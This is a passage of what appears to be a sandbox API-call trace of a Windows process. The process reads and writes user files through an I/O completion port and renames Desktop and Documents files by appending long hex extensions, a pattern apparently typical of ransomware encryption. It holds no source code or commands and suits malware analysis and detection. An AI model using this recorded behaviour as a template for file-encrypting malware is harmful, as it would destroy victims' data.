lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.643] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.644] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.645] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif", lpString2=".AC6F4EEE3B9456A5C51E5083116C973542B2F25624D8C67D60163FB8E9F08D4E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif.AC6F4EEE3B9456A5C51E5083116C973542B2F25624D8C67D60163FB8E9F08D4E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif.AC6F4EEE3B9456A5C51E5083116C973542B2F25624D8C67D60163FB8E9F08D4E" [0123.645] GetProcessHeap () returned 0x600000 [0123.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x6f1c30 [0123.645] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x6f1c30, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0123.646] CloseHandle (hObject=0x320) returned 1 [0123.646] GetProcessHeap () returned 0x600000 [0123.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.646] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.649] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.650] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.650] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.651] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt", lpString2=".A720D044388ECD57121EFE2F685044803A7D41D92EC7F3C76D686EB9E06D280D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt.A720D044388ECD57121EFE2F685044803A7D41D92EC7F3C76D686EB9E06D280D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt.A720D044388ECD57121EFE2F685044803A7D41D92EC7F3C76D686EB9E06D280D" [0123.651] GetProcessHeap () returned 0x600000 [0123.651] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x6f1d58 [0123.651] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x6f1d58, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0123.652] CloseHandle (hObject=0x320) returned 1 [0123.653] GetProcessHeap () returned 0x600000 [0123.653] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.653] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.656] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x7e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.656] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.657] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.658] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a", lpString2=".CE7EDED052AF404F0581A794D8EE53ACBD93D1FF5170EBA96EEC83F9CBEDAC7A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a.CE7EDED052AF404F0581A794D8EE53ACBD93D1FF5170EBA96EEC83F9CBEDAC7A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a.CE7EDED052AF404F0581A794D8EE53ACBD93D1FF5170EBA96EEC83F9CBEDAC7A" [0123.658] GetProcessHeap () returned 0x600000 [0123.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x6f6050 [0123.658] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x6f6050, Length=0x128, FileInformationClass=0xa) returned 0x0 [0123.659] CloseHandle (hObject=0x320) returned 1 [0123.660] GetProcessHeap () returned 0x600000 [0123.660] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.661] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.666] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.668] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.669] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3", lpString2=".5301441C3068180E3EFCEA9891274128A410B0141ACDC70E2EAE2984DAC85D02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3.5301441C3068180E3EFCEA9891274128A410B0141ACDC70E2EAE2984DAC85D02") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3.5301441C3068180E3EFCEA9891274128A410B0141ACDC70E2EAE2984DAC85D02" [0123.670] GetProcessHeap () returned 0x600000 [0123.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x118) returned 0x3368878 [0123.670] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x3368878, Length=0x118, FileInformationClass=0xa) returned 0x0 [0123.671] CloseHandle (hObject=0x320) returned 1 [0123.851] GetProcessHeap () returned 0x600000 [0123.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.862] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.939] WriteFile (in: hFile=0x328, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0123.940] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.955] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.955] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav", lpString2=".D5B3B051E54FF62C34408F95F4494644A7FB9A77D1C4204B18A28BA9082E3E69" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav.D5B3B051E54FF62C34408F95F4494644A7FB9A77D1C4204B18A28BA9082E3E69") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav.D5B3B051E54FF62C34408F95F4494644A7FB9A77D1C4204B18A28BA9082E3E69" [0123.955] GetProcessHeap () returned 0x600000 [0123.956] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x6f21d8 [0123.956] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6f21d8, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0123.957] CloseHandle (hObject=0x31c) returned 1 [0123.957] GetProcessHeap () returned 0x600000 [0123.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.958] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.962] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.962] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.963] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.963] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg", lpString2=".522F9A32878F0C249E4B788BEDB94DB00757F862506147179C16C5E578F2E47A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg.522F9A32878F0C249E4B788BEDB94DB00757F862506147179C16C5E578F2E47A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg.522F9A32878F0C249E4B788BEDB94DB00757F862506147179C16C5E578F2E47A" [0123.963] GetProcessHeap () returned 0x600000 [0123.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x6f22f0 [0123.963] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6f22f0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0123.965] CloseHandle (hObject=0x31c) returned 1 [0123.965] GetProcessHeap () returned 0x600000 [0123.965] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.966] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.973] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.974] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.975] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.975] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav", lpString2=".590D07132F5C785C8DDD822827C96FC59A28F993737EB5B824B836C6FC9C3F64" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav.590D07132F5C785C8DDD822827C96FC59A28F993737EB5B824B836C6FC9C3F64") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav.590D07132F5C785C8DDD822827C96FC59A28F993737EB5B824B836C6FC9C3F64" [0123.975] GetProcessHeap () returned 0x600000 [0123.975] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x33689a0 [0123.975] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x33689a0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0123.977] CloseHandle (hObject=0x31c) returned 1 [0123.977] GetProcessHeap () returned 0x600000 [0123.977] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.977] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.982] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.982] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.983] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0123.984] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi", lpString2=".0CCED76BC2346EA3117C2B8DCE8BCAD6E0775D3C859EF13F0D0A0149C8904D4F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi.0CCED76BC2346EA3117C2B8DCE8BCAD6E0775D3C859EF13F0D0A0149C8904D4F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi.0CCED76BC2346EA3117C2B8DCE8BCAD6E0775D3C859EF13F0D0A0149C8904D4F" [0123.984] GetProcessHeap () returned 0x600000 [0123.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x110) returned 0x6f2418 [0123.984] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6f2418, Length=0x110, FileInformationClass=0xa) returned 0x0 [0123.985] CloseHandle (hObject=0x31c) returned 1 [0123.986] GetProcessHeap () returned 0x600000 [0123.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.986] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.058] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.063] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.064] WriteFile (in: hFile=0x328, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.070] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.084] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.092] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.092] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.101] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.101] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.102] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2b3ff70) returned 0x0 [0124.102] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt", lpString2=".34B56BE327DA97CFB5C21B98F494DB70581EB82C621DA42A55EA7D85FB9CB361" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt.34B56BE327DA97CFB5C21B98F494DB70581EB82C621DA42A55EA7D85FB9CB361") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt.34B56BE327DA97CFB5C21B98F494DB70581EB82C621DA42A55EA7D85FB9CB361" [0124.102] GetProcessHeap () returned 0x600000 [0124.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315f7c8 [0124.103] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2b3ff60, FileInformation=0x315f7c8, Length=0x162, FileInformationClass=0xa) returned 0x0 [0124.104] CloseHandle (hObject=0x33c) returned 1 [0124.104] GetProcessHeap () returned 0x600000 [0124.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.104] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.108] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.108] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.115] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.118] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.124] ReadFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.124] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.125] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2b3ff70) returned 0x0 [0124.125] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx", lpString2=".AA87047EEBAA602BE12567A1161B04AC8139E40E98045FD84E817E779EB97C6A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx.AA87047EEBAA602BE12567A1161B04AC8139E40E98045FD84E817E779EB97C6A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx.AA87047EEBAA602BE12567A1161B04AC8139E40E98045FD84E817E779EB97C6A" [0124.126] GetProcessHeap () returned 0x600000 [0124.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15e) returned 0x336a5d0 [0124.126] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x336a5d0, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0124.127] CloseHandle (hObject=0x31c) returned 1 [0124.127] GetProcessHeap () returned 0x600000 [0124.127] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.127] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.163] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.166] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.182] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.183] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps", lpString2=".BA038E1F0AFF9C29C997130EC8D8A87CA10444F79315C846D9CA9C887BA83A7D" | out: 